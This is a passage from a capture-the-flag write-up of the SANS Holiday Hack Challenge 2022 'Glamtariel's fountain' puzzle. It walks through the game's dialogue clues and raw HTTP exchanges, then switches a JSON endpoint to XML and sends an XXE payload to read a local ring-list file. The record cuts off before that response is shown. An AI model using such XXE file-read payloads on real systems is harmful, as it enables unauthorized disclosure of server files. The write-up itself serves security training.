&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on the fountain:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;The fountain: &amp;quot;I pretty much stick to just one &lt;strong&gt;TYPE&lt;/strong&gt; of language,
it's a lot easier to share things that way.&amp;quot;&lt;/li&gt;
&lt;li&gt;Glamtariel: &amp;quot;Did you know that I speak in many &lt;strong&gt;TYPE&lt;/strong&gt; s of
languages?  For simplicity, I usually only communicate with this one
though.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;The star:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel or the fountain (same behavior):&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;O Frostybreath Kelthonial, shiny stars grace the night
from heavens on high!&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;Up and far many look away from glaciers cold, To
Phenhelos they sing here in Kringle's realm!&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;img alt="The web interface of Glamtariel's fountain. We see Glamtariel, her fountain, and four small images of a red ring, a silver ring, and two blue rings." class="align-center" src="/images/sans-christmas-challenge-2022/fountain_website_3.png" /&gt;
&lt;p&gt;Here's what we get when we drop them:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;The blue rings (same behavior for both):&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;I love these fancy blue rings! You can see I have two of
them. Not magical or anything, just really pretty.&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;If asked, Glamtariel definitely tries to insist that
the blue ones are her favorites. I'm not so sure though.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on the fountain:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;The fountain: &amp;quot;Glamtariel can be pretty tight lipped about some
things.&amp;quot;&lt;/li&gt;
&lt;li&gt;Glamtariel: &amp;quot;I like to keep track of all my rings using a &lt;strong&gt;SIMPLE
FORMAT&lt;/strong&gt;, although I usually don't like to discuss such things.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;The silver ring:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;Wow!, what a beautiful silver ring! I don't have one of
these. I keep a list of all my rings in my &lt;strong&gt;RINGLIST&lt;/strong&gt; file. Wait a
minute! Uh, promise me you won't tell anyone.&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;I never heard Glamtariel mention a &lt;strong&gt;RINGLIST&lt;/strong&gt; file
before. If only there were a way to get a peek at that.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on the fountain:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;The fountain: &amp;quot;Glamtariel may not have one of these silver rings in
her collection, but I've overheard her talk about how much she'd like
one someday.&amp;quot;&lt;/li&gt;
&lt;li&gt;Glamtariel: &amp;quot;You know what one of my favorite songs is? Silver rings,
silver rings ....&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;The red ring:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on Glamtariel:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;Glamtariel: &amp;quot;Ah, the fiery red ring! I'm definitely proud to have one
of them in my collection.&amp;quot;&lt;/li&gt;
&lt;li&gt;The fountain: &amp;quot;I think Glamtariel might like the red ring just as
much as the blue ones, perhaps even a little more.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;When dropped on the fountain:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;The fountain: &amp;quot;You know, I've heard Glamtariel talk in her sleep
about rings using a different &lt;strong&gt;TYPE&lt;/strong&gt; of language. She may be more
responsive about them if you ask differently.&amp;quot;&lt;/li&gt;
&lt;li&gt;Glamtariel: &amp;quot;Hmmm, you seem awfully interested in these rings. Are
you looking for something? I know I've heard through the ice cracks
that Kringle is missing a special one.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And that's it. After that, the messages loop and nothing changes.&lt;/p&gt;
&lt;p&gt;Let's recap. You might have noticed that some words are in all caps. If you
remember Hal Tandibuck's clue, these words have some importance. These words
are:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;TAMPER&lt;/code&gt;: this actually means we should &lt;strong&gt;not&lt;/strong&gt; tamper with the cookies
(I spent several hours trying to but getting nowhere...)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;PATH&lt;/code&gt;: this probably means that we're going to need to guess the path
to... something?&lt;/li&gt;
&lt;li&gt;&lt;code&gt;APP&lt;/code&gt;: this word is used with &lt;code&gt;PATH&lt;/code&gt;, so maybe &lt;code&gt;APP&lt;/code&gt; is a
part of the path we must find?&lt;/li&gt;
&lt;li&gt;&lt;code&gt;TYPE&lt;/code&gt;: Glamtariel says she understands another type of language, more
on that later.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;RINGLIST&lt;/code&gt;: Glamtariel keeps a list of her rings in a file, this must
be what we must find a path to.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SIMPLE FORMAT&lt;/code&gt;: this list of rings is kept in a simple format, most
likely in a &lt;code&gt;.txt&lt;/code&gt; file.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We also learn that Glamtariel pretends her favorite rings are the blue ones,
but would very much like to add a silver ring to her collection.&lt;/p&gt;
&lt;p&gt;Now, let's take a look under the hood. What &amp;quot;language&amp;quot; are we using to talk to
Glamtariel and her fountain? Here's the request we sent when we dropped the
silver ring on Glamtariel:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/dropped&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GCLB=&amp;quot;245893ca62dcb86d&amp;quot;; MiniLembanh=99e85c94-c24e-4916-8214-996b143317b5.EN8o8Hzkc6bGjlB7yO10QNWkXwg&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;X-Grinchum&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ImI0NWVlYzE1MTMxMGU5MzRmZGI0NDlkNDQxNjQyMzA2ZjkzMTk3NDYi.Y7hu8g.S-ougqTjKWzwSN2US_Z9jmmBca8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;52&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com/&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;imgDrop&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;img1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;who&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;princess&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;reqType&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;json&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Werkzeug/2.2.2 Python/3.10.8&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Fri, 06 Jan 2023 19:01:50 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;333&lt;/span&gt;
&lt;span class="na"&gt;Set-Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;MiniLembanh=99e85c94-c24e-4916-8214-996b143317b5.EN8o8Hzkc6bGjlB7yO10QNWkXwg; Domain=glamtarielsfountain.com; Path=/&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;h3=&amp;quot;:443&amp;quot;; ma=2592000,h3-29=&amp;quot;:443&amp;quot;; ma=2592000&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;appResp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Wow!, what a beautiful silver ring! I don&amp;#39;t have one of these. I keep a list of all my rings in my RINGLIST file. Wait a minute! Uh, promise me you won&amp;#39;t tell anyone.^I never heard Glamtariel mention a RINGLIST file before. If only there were a way to get a peek at that.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;droppedOn&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;visit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We're using JSON, but apparently Galamtriel supports another type of language.
It would be interesting if it was XML, because we could &lt;a class="reference external" href="https://www.netspi.com/blog/technical/web-application-penetration-testing/playing-content-type-xxe-json-endpoints/"&gt;exploit an XXE
vulnerability against this JSON endpoint&lt;/a&gt;.
Let's &lt;a class="reference external" href="https://www.convertjson.com/json-to-xml.htm"&gt;convert our JSON to XML&lt;/a&gt;
and see if it works. We must also make sure to change the &lt;code&gt;reqType&lt;/code&gt;
parameter from &lt;code&gt;json&lt;/code&gt; to &lt;code&gt;xml&lt;/code&gt;, as well as modifying the
&lt;code&gt;Content-Type&lt;/code&gt; header:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/dropped&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GCLB=&amp;quot;245893ca62dcb86d&amp;quot;; MiniLembanh=5187b7cc-eaa1-4945-8e16-794290a2dea9.jXW5lp2QZAQt5_9jSvnHEmvi4lI&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;/span&gt;&lt;span class="na"&gt;X-Grinchum&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ImQ3MTM1MWVhNjY2MjgyNzI4YmRjNGJjYWQ5M2MwNmU3MDZhZTJhZmIi.Y7h6Bw.AOMSA0YJKPm1PIU5Tql7hdYfqFk&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;132&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com/&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot; ?&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;root&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;imgDrop&amp;gt;&lt;/span&gt;img1&lt;span class="nt"&gt;&amp;lt;/imgDrop&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;who&amp;gt;&lt;/span&gt;princess&lt;span class="nt"&gt;&amp;lt;/who&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="nt"&gt;&amp;lt;reqType&amp;gt;&lt;/span&gt;xml&lt;span class="nt"&gt;&amp;lt;/reqType&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/root&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Werkzeug/2.2.2 Python/3.10.8&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Fri, 06 Jan 2023 19:45:07 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;193&lt;/span&gt;
&lt;span class="na"&gt;Set-Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;MiniLembanh=5187b7cc-eaa1-4945-8e16-794290a2dea9.jXW5lp2QZAQt5_9jSvnHEmvi4lI; Domain=glamtarielsfountain.com; Path=/&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;h3=&amp;quot;:443&amp;quot;; ma=2592000,h3-29=&amp;quot;:443&amp;quot;; ma=2592000&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;appResp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;I love rings of all colors!^She definitely tries to convince everyone that the blue ones are her favorites. I&amp;#39;m not so sure though.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;droppedOn&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;visit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Well, it seems to work, great! Now maybe we can try to exploit an XXE. I first
tried to really exploit the vulnerability to get an error with a verbose
message, or even try a blind XXE (with domain name resolution, or HTTPS
connect back to get a malicious DTD, that sort of thing). But the XXE is
simulated inside the application.&lt;/p&gt;
&lt;p&gt;Anyway, we want to leak the ring list file. By taking a look at the requests
made to the website, we see that the different images, including the ones
depicting rings, are stored in &lt;code&gt;/static/images/&lt;/code&gt;. But we need to find
the web root on the file system. Since we had the clue with the word
&lt;code&gt;APP&lt;/code&gt;, we can try &lt;code&gt;/app&lt;/code&gt; as a webroot. Finally, the file name.
Well, it's a ring list stored in a simple format, so let's try
&lt;code&gt;ringlist.txt&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now, we search for a &lt;a class="reference external" href="https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file"&gt;payload that would allow to read a local file&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/dropped&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GCLB=&amp;quot;245893ca62dcb86d&amp;quot;; MiniLembanh=408dde46-71cf-440e-a273-f801f09c640c.-A_2od6HzDxSWK9x5SxwJURAsao&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;X-Grinchum&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Ijc0MzU2YzI1NTU1NmJhMjQ2Mzc4NjYzMWYwNTg1N2ViNmYyNmFkMWUi.Y7bJLw.CoFMFSmUXQ7Ke7ol0JnKxs88EbE&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;221&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com/&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot; ?&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="cp"&gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ENTITY example SYSTEM &amp;quot;file:///app/static/images/ringlist.txt&amp;quot;&amp;gt;&lt;/span&gt; ]&amp;gt;
&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;root&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt; &lt;span class="nt"&gt;&amp;lt;imgDrop&amp;gt;&lt;/span&gt;&lt;span class="ni"&gt;&amp;amp;example;&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/imgDrop&amp;gt;&lt;/span&gt;
&lt;/span&gt;  &lt;span class="nt"&gt;&amp;lt;who&amp;gt;&lt;/span&gt;princess&lt;span class="nt"&gt;&amp;lt;/who&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;reqType&amp;gt;&lt;/span&gt;xml&lt;span class="nt"&gt;&amp;lt;/reqType&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/root&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Werkzeug/2.2.2 Python/3.10.8&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 05 Jan 2023 13:00:33 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;350&lt;/span&gt;
&lt;span class="na"&gt;Set-Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;MiniLembanh=408dde46-71cf-440e-a273-f801f09c640c.-A_2od6HzDxSWK9x5SxwJURAsao; Domain=glamtarielsfountain.com; Path=/&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
